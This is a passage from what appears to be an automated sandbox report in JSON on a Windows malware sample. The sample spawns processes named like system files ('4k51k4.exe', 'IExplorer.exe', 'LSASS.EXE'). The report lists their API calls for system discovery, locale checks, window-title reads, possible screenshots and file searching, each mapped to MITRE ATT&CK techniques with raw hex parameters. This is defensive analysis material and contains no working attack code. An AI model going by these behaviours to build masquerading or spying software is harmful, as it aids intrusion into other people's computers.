\"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005068)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005068)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00003392)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00003392)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00001256)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb86757895210000f0fd7f9a5c517700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c5177608258772000000000f0fd7f9a5c517700e0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8675d8951c0000f0fd7f9a5c517700e0fd7f50c7120044f0fd7f00000000400000003f0000001f00000000f0fd7f44c71200c15c5177608258771f00000000f0fd7f9a5c517700e0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bdc01d01bdc010016dc010000d901e414dc018800000088000000176850779817dc01ff2b50776d546b77a41bdc01ac011d0000001d000000d901c06dd90114009800d1040000c06dd9015016dc01100000000000000015009300d1040000c06dd901 (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8675088e21000070fd7f9a5c517700f0fd7f50c712004470fd7f00000000400000003f000000200000000070fd7f44c71200c15c517760825877200000000070fd7f9a5c517700f0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00004972)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21b4e01d01b4e0100164e0100004b01e4144e0188000000880000001768507798174e01ff2b507704576b77a41b4e01ac011a0000001a0000004b01c06d4b011200a2001b040000c06d4b0150164e01100000000000000013009d001b040000c06d4b01 (UID: 00000000-00002712)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bcf01d01bcf010016cf010000cc01e414cf018800000088000000176850779817cf01ff2b507771466b77a41bcf01ac012f0000002f000000cc01c06dcc0116008e005a010000c06dcc015016cf011000000000000000170089005a010000c06dcc01 (UID: 00000000-00005592)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb867590e9330000f0fd7f9a5c517700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c5177608258772000000000f0fd7f9a5c517700e0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00005592)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a00100005a1b4c01581b4c0188154c01000049016c144c0188000000880000001768507720174c01ff2b5077313c6b772c1b4c01ac012c0000002c0000004901905b49011200a200d1040000905b4901d8154c01100000000000000013009d00d1040000905b4901 (UID: 00000000-00004996)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21be601d01be6010016e6010000e301e414e6018800000088000000176850779817e601ff2b5077f6326b77a41be601ac011700000017000000e301c06de3011400980016040000c06de3015016e60110000000000000001500930016040000c06de301 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb867598c51b000060fd7f9a5c517700f0fd7f50c712004460fd7f00000000400000003f000000200000000060fd7f44c71200c15c517760825877200000000060fd7f9a5c517700f0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21b5201d01b52010016520100004f01e414520188000000880000001768507798175201ff2b507752326b77a41b5201ac0125000000250000004f01c06d4f0114009800d1040000c06d4f0150165201100000000000000015009300d1040000c06d4f01 (UID: 00000000-00005068)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a00100005a1bd201581bd2018815d2010000cf016c14d2018800000088000000176850772017d201ff2b5077b6286b772c1bd201ac016200000062000000cf01905bcf011200a20016040000905bcf01d815d201100000000000000013009d0016040000905bcf01 (UID: 00000000-00003392)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb8675b8e9650000f0fd7f9a5c517700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c5177608258772000000000f0fd7f9a5c517700e0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00003520)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bea01d01bea010016ea010000e701e414ea018800000088000000176850779817ea01ff2b5077742e6b77a41bea01ac012200000022000000e701c06de7011400980019040000c06de7015016ea0110000000000000001500930019040000c06de701 (UID: 00000000-00001256)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bde01d01bde010016de010000db01e414de018800000088000000176850779817de01ff2b5077a6196b77a41bde01ac012e0000002e000000db01c06ddb0116008e0039020000c06ddb015016de0110000000000000001700890039020000c06ddb01 (UID: 00000000-00002640)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb867508d532000080fd7f9a5c517700f0fd7f50c712004480fd7f00000000400000003f000000200000000080fd7f44c71200c15c517760825877200000000080fd7f9a5c517700f0fd7f68c71200578950778083587713174f75d8eb8675 (UID: 00000000-00002640)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bbc01d01bbc010016bc010000b901e414bc018800000088000000176850779817bc01ff2b507702196b77a41bbc01ac011e0000001e000000b901c06db90116008e009c020000c06db9015016bc011000000000000000170089009c020000c06db901 (UID: 00000000-00005248)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a00100005a1bb701581bb7018815b7010000b4016c14b7018800000088000000176850772017b701ff2b5077dc136b772c1bb701ac015f0000005f000000b401905bb4011200a200d1040000905bb401d815b701100000000000000013009d00d1040000905bb401 (UID: 00000000-00000920)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21b3e01d01b3e0100163e0100003b01e4143e0188000000880000001768507798173e01ff2b507717166b77a41b3e01ac0162000000620000003b01c06d3b0116008e009c020000c06d3b0150163e011000000000000000170089009c020000c06d3b01 (UID: 00000000-00004800)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21b6c00d01b6c0000166c0000006900e4146c0088000000880000001768507798176c00ff2b507738166b77a41b6c00ac012c0000002c0000006900c06d690014009800aa040000c06d690050166c00100000000000000015009300aa040000c06d6900 (UID: 00000000-00004624)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bb801d01bb8010016b8010000b501e414b8018800000088000000176850779817b801ff2b5077e80b6b77a41bb801ac012f0000002f000000b501c06db50116008e009c020000c06db5015016b8011000000000000000170089009c020000c06db501 (UID: 00000000-00002732)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059507798010000a0010000d21bfe01d01bfe010016fe010000fb01e414fe018800000088000000176850779817fe01ff2b50770f086b77a41bfe01ac012400000024000000fb01c06dfb011400980066050000c06dfb015016fe0110000000000000001500930066050000c06dfb01 (UID: 00000000-00005620)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004972)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004996)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005068)\n \"4k51k4.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003392)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001256)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002640)\n \"SERVICES.EXE\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00005248)\n \"SERVICES.EXE\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005248)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000200054db1200b344446b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce2120018a3c0d710e0120010e012005ecbb8751401000000000000005db6756ce212000e5db67504de1200dcaaba75010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600c983f1d7e4db12006d826b771479210004010000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000610032006300340034003800390034003300650032003200350033003300390037006300320032003600660031003200620038003800390039003800350037003700350062003300640062006500300034003500370038006300380037003100370038002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b50774a546b77d8eb8675ac011d0000001d0000000000000000000000ffff87010000000000000000000000000000000000000100f70087010000000000000000000038701d0000000000200000000000000000000000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000230001000000ffffffff020000000800000058f3210058f3210053f321000000000002000000b88f1f0000000000010000080000000054ed120095e14c77f2802900feffffffccda12003f08747502000000b88f1f00000000000100001888fb7375bcda1200c81cba7592dc120095fb7375f0db1200b88f1f0000000000000000000000000078db120000001d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001583f1d738db12006d826b771479210004010000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003d8cf1d750d412006d826b776496230004010000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100a4d01200b344446b0900000000000000000000000000000000000000000000000000000078010000000000000000000000000000bcd71200a8a9c0d760d5120060d512005ecbb8757801000000000000005db675bcd712000e5db67554d31200dcaaba7501000000000000007a000000ffffffffffffffffdcd01200780200000000000025000000dcd012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001989f1d734d112006d826b772c9c230004010000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300003b000000001d0000000000409e230098d012000464507738011d00e063507702000000b88f1f000000000001000008f2802900feffffffbcc75877c0c758770a000000800f000000001d00189c2300f83b0000ff07000000001d00000000007f070000c4001d0008301d007924000048d0120067e54d7700001d00189c23000000000000001d00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006588f1d788d012006d826b772c9c230004010000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100687a2100637a2100000000000000000000001d0000000001d4cc12000000000038da120095e14c77f2802900feffffff435c507750595077aa000000b8000000627a2100607a21005cce120094d21200000000000000000000000000000000000000000000000000001b000000001d001c5c4f7760d84e75ffffffff170000000cce12002400000003000000fcd2120028d8120094d212008600000038ce120096ed50778a7a2100a06a2675860000005cce120094d212000000000086008800a06a26755cce1200916c26758a7a2100a06a2675a06a2675ccd2120002020000 (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b0054db1200b344446b05000000000000000000000000000000000000000000000000000000140100000000000000000000000000006ce212004f39ffcb10e0120010e012005ecbb8751401000000000000005db6756ce212000e5db67504de1200dcaaba75010000000000000072000000ffffffffffffffff8cdb12007802000000000000250000008cdb12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360081a5f1cbe4db12006d826b7744591c0004010000 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005188)\n \"4k51k4.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b50774e666b77d8eb8675ac01180000001800000000000000000025004300120000000000000000000000000000000000000026003e00120000000000000000000000e06e180000000000200000000000000000000000 (UID: 00000000-00005188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"IsWow64Process\" with parameter \"5240\" - (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"IsWow64Process\" with parameter \"5188\" - (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"4972\" - (UID: 00000000-00004972)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"5592\" - (UID: 00000000-00005592)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"5664\" - (UID: 00000000-00005664)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"3520\" - (UID: 00000000-00003520)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"2640\" - (UID: 00000000-00002640)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"1600\" - (UID: 00000000-00001600)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005188)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004972)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005240)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"GetWindowTextA\" (UID: 00000000-00005240)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00005188)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004972)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002712)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005592)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004996)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005068)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003392)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001256)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002640)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005248)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000920)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004800)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004624)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002732)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005620)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000948)\n \"4k51k4.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005820)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001600)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005848)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003840)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002720)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000620)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006048)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005452)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"939592417\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"939592417\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"939592417\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"604047868\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005240)\n 